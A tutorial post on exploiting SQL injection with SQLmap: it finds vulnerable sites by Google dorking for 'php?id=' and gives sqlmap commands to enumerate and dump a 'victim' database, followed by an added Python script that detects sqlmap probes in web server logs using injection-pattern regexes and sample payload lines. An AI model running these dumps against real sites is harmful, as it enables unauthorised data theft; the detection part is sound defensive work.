SQL, Structured Query Language, is a programming language that allows the user to manage data in a relational database management system (RDBMS) through the use of specially crafted strings. Although great for functionality, it can be disastrous if configured/crafted incorrectly. We can exploit this using the pentesting tool SQLmap.

SQLmap is a penetration testing tool that automates the process of exploiting SQL injection flaws and SQL database takeover. More information on SQLmap can be found using Google, or the option -h.

Requirements:
- Basic understanding of SQL
- SQLmap
- Common Sense

This is for educational and research purposes only! Do not attempt to violate the law with anything contained here.

Step 1: Identifying the Target
To find a possibly vulnerable site, we'll Google dork search the term: "php?id=". A dork is an advanced search using Google operators such as "", site:, and filetype:. A potentially vulnerable site looks something like this: https://mytarget.com/info.php?id=1

Step 2: Database Enumeration
Now that we've found a target, let's identify the databases.
sqlmap -u $url --batch --dbs
where $url is the target url.
We have the database names; let's use this information to get the tables.
sqlmap -u $url --batch --tables -D $databasename
Where $url is the Victim URL and $databasename is the name of the database.
With that information, we can discover the columns.
sqlmap -u $url --columns -D $databasename -T $tablename
Where $url is the Victim URL, $databasename is the name of the database, and $tablename is the name of the table.

Step 3: The Dump
Now that we know the database, the table and its columns, let's dump the contents.
sqlmap -u $url --dump -D $databasename -T $tablename
And we'll get something like this:
That's it! I'll be posting again, so stay tuned!

Bonus: Here's a list of other popular Google dork queries
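The enumeration in Steps 2 and 3 is noisy from the server's side: every --dbs, --tables and --dump run fires a burst of probe requests at the same id parameter, and each one lands in the web server access log. The script below is an added example, not part of the original post, that flags such requests in constructed sample log lines, by the "sqlmap/" prefix of sqlmap's default User-Agent and by the injection fragments in the parameter value; the IP addresses, timestamps and log lines are made up for the demo.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Fragments that appear in the probes an injection tool sends while testing and enumerating a GET parameter.
SQLI_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\b(and|or)\b\s+\d+\s*=\s*\d+",           # boolean-based blind (AND 1=1 / AND 1=2)
    r"\bunion\b.{0,40}\bselect\b",              # UNION-based extraction
    r"\b(sleep|benchmark|pg_sleep|waitfor)\b",  # time-based blind
    r"\border\s+by\s+\d+",                      # column-count probing
    r"information_schema",                      # database/table/column enumeration
)]
# Constructed sample log (not real traffic); 198.51.100.7 is the assumed scanner. Its third
# request carries a browser-like User-Agent, so the parameter check has to catch it on its own.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /info.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /info.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /info.php?id=1%20AND%201%3D2 HTTP/1.1" 200 498 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2023:13:55:45 +0000] "GET /info.php?id=1%20ORDER%20BY%2010 HTTP/1.1" 500 231 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:56:02 +0000] "GET /info.php?id=2 HTTP/1.1" 200 530 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return the reasons a log line looks like SQL injection tooling ([] if it looks clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    if m.group("ua").lower().startswith("sqlmap/"):
        reasons.append("default sqlmap User-Agent")
    # parse_qsl percent-decodes the values, so the patterns run on what the database would see.
    for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        for pat in SQLI_PATTERNS:
            if pat.search(value):
                reasons.append(f"injection probe in parameter '{name}': {pat.pattern}")
                break
    return reasons

def scan(log_text):
    """Count flagged requests per source IP; a burst from one IP is the enumeration signature."""
    flagged = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and classify(line):
            flagged[m.group("ip")] += 1
    return dict(flagged)
```

The User-Agent check alone is not enough, since sqlmap's --random-agent option replaces the default string; the parameter patterns are what catch the third request. Parameterized queries in the PHP handler remove the injection itself; this scan only tells you someone is probing for it.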